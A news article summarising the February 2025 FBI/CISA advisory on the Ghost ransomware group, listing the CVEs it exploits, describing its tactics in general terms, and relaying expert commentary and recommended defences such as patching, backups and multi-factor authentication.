Latest Update, February 22, 2025: This article, first published on February 20, now offers additional technical insights into the Ghost ransomware operation, alongside expert insights from various cybersecurity professionals regarding the FBI’s security advisory.

Current trends in cyber threats often include phishing, social engineering, and scams. However, whether labeled as “click here” campaigns or otherwise, these are not the only threats requiring attention. Overlooking various attack strategies is like ignoring a thief while they take your belongings.

Recently, the Federal Bureau of Investigation (FBI) published a crucial security advisory about a severe ransomware threat called Ghost, which is currently executing attacks across various industries in over 70 countries. Here’s what you must know and the essential steps the FBI recommends for immediate protection.

Forbes
Most Sophisticated Gmail Attacks Ever—FBI Says: Do Not Click Anything
By Davey Winder

FBI Issues Urgent Advisory on Ghost Ransomware

On February 19, the FBI and the Cybersecurity and Infrastructure Security Agency released a joint security advisory (see AA25-050A) warning organizations globally about the Ghost ransomware group, which is actively targeting diverse sectors across numerous countries.

Working primarily from China, these threat actors are known by various aliases, with Ghost being the most prevalent. Other names include Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture. A notable aspect of their approach is their reliance on publicly available code to exploit unpatched software and firmware vulnerabilities, leading to access to internet-facing servers followed by the deployment of ransomware.

According to the advisory, “The FBI has observed Ghost actors gaining entry to networks through vulnerabilities in publicly accessible applications closely associated with numerous Common Vulnerabilities and Exposures (CVEs).” Their approaches notably include exploiting weaknesses in Fortinet FortiOS appliances, Adobe ColdFusion servers, Microsoft SharePoint, and Microsoft Exchange, commonly referred to as the ProxyShell attack chain.

Several specific CVEs have been identified as being exploited during Ghost ransomware incidents, including:

• CVE-2009-3960
• CVE-2010-2861
• CVE-2018-13379
• CVE-2019-0604
• CVE-2021-31207
• CVE-2021-34473
• CVE-2021-34523

The listed CVE references include the year the vulnerability was identified, and notably, many of these vulnerabilities date back to 2009, underscoring the alarming reality that some systems have remained unpatched for over 15 years.

The advisory went on to describe how Ghost’s operators often upload a web shell to compromised servers. This allows them to utilize a mix of Windows command prompts and PowerShell to download and execute a Cobalt Strike Beacon on targeted systems. While employing an established penetration tool is not unusual, it raises eyebrows that cybercriminals leverage a tool designed for auditing security controls.

Forbes
1 Million Stolen Credit Cards Given Away Free On Dark Web Forum
By Davey Winder

According to the FBI, “Ghost actors frequently exploit built-in Cobalt Strike functions to steal process tokens operating under the SYSTEM user context to impersonate this user.” This is often utilized for re-launching Beacon with elevated privileges. The hashdump function is then employed to collect various credentials, including passwords, while another function lists running processes to identify active antivirus software scheduled for disabling. In many cases, Windows Defender is “frequently disabled” on networked devices.

Interestingly, while double-extortion tactics are prevalent, the FBI indicated that Ghost claims it will sell exfiltrated data unless a ransom is paid, although evidence suggests that significant amounts of sensitive data are rarely taken from the compromised entities, especially regarding “intellectual property or personally identifiable information that could severely harm victims if disclosed.”

Expert Insights on the FBI’s Ghost Warning

Juliette Hudson, CTO at CybaVerse, describes Ghost as a menacing nation-state threat that organizations must address. She emphasizes the pressing need for organizations to promptly patch and remediate vulnerabilities actively exploited by this group. In agreement, Darren Guccione, CEO of Keeper Security, warns that the Ghost ransomware initiative exemplifies how adversaries exploit known vulnerabilities faster than organizations can resolve them, reinforcing an urgent need for proactive risk management.

Joe Silva, CEO at Spektion, highlights that Ghost’s campaign underscores how attackers leverage patch fatigue among overwhelmed security teams. “This proves that traditional vulnerability management approaches are ineffective against the increasing number of exploits,” Silva asserts.

Rom Carmel, CEO at Apono, warns that cybercriminals continually find ways to infiltrate deeper into systems by compromising legitimate accounts. “To reduce the impact of account breaches, organizations must not only authenticate access but also enforce precise privilege controls tailored to limit access to critical resources,” Carmel advises.

Forbes
Restrict Network Access As World’s Fastest-Rising Ransomware Strikes
By Davey Winder

Agnidipta Sarkar, VP CISO advisory at ColorTokens, characterizes Ghost’s attacks as a significant global threat. He emphasizes the necessity for understanding how the group identifies its victims. As Ghost targets unpatched vulnerabilities in tools like VPNs and firewalls, “They only require one successful breach to infiltrate victim networks,” Sarkar explains. Critically, many organizations, especially in crucial infrastructure cybersecurity, neglect to address lateral movement after initial access.

Tim Mackey, head of software supply chain risk strategy at Black Duck, asserts that attacks on legacy cyber-physical and IoT devices are to be expected, necessitating solid operational plans for mitigating associated risks. “Even robustly secured devices from a decade ago can remain vulnerable today, especially to upcoming threats,” Mackey concludes. It’s essential that organizations collaborate with suppliers to formulate long-term operations and risk mitigation plans that prioritize timely vulnerability patching and threat intelligence sharing.

Four Immediate Actions Recommended by the FBI

The FBI urges all organizations to execute the following measures promptly to reduce the risks associated with the Ghost ransomware threat:

1. Regularly back up systems, ensuring backups are stored separately, so they remain unaltered and unencrypted by potentially infected network devices.
2. Swiftly patch known vulnerabilities by applying security updates to operating systems, software, and firmware in a timely risk-informed manner.
3. Segment networks to prevent lateral movement from initially infected devices to others within the organization.
4. Enforce phishing-resistant multi-factor authentication for access to all privileged accounts and email service accounts.

Forbes
Homeland Security Alert—Ongoing Critical Microsoft Outlook Attack
By Davey Winder

In addition, ongoing phishing awareness training for users, applying the principle of least privilege in permission granting, and disabling unused ports are strongly recommended. The FBI also advises organizations to adopt allowlisting for applications, scripts, and network traffic to prevent unauthorized access and execution.

Ghost is a significant threat from a nation-state actor, and organizations must take steps to safeguard against it,” cautioned Juliette Hudson, CTO at CybaVerse. “The group capitalizes on known CVEs in widely-used technologies, highlighting the urgent need for systematic patching and remediation strategies.”

Simon Phillips, CTO at SecureAck, added that the FBI and CISA advisories illustrate how the Ghost ransomware operation differs from typical ransomware attacks involving social engineering. “Given the business-oriented nature of the products targeted and the older CVEs being exploited, there’s an immediate need to strengthen basic security protocols,” he emphasized.

In conclusion, the FBI advises against paying ransoms, noting that such actions do not ensure victims will recover their files and may incentivize further cybercrime. As the advisory states, “Paying ransoms could encourage adversaries to target more organizations and motivate others to increase their ransomware distribution or fund illegal activities.”